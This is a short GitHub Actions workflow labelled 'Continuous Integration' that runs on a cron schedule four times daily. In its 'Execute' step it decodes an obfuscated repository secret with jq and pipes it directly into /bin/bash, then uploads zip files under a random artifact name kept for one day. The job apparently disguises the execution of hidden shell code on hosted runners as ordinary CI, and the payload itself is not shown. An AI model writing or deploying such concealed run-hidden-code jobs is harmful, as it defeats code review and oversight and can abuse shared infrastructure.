name: Continuous Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '31 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          fson134: ${{ secrets.fson134 }}
        run: |
          printf '%s' "$fson134" | jq -r .eefdk007 | /bin/bash
          printf '%s' "$o19" | jq -r .dly972 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: sFgIoueJ
          path: "*.zip"
          retention-days: 1
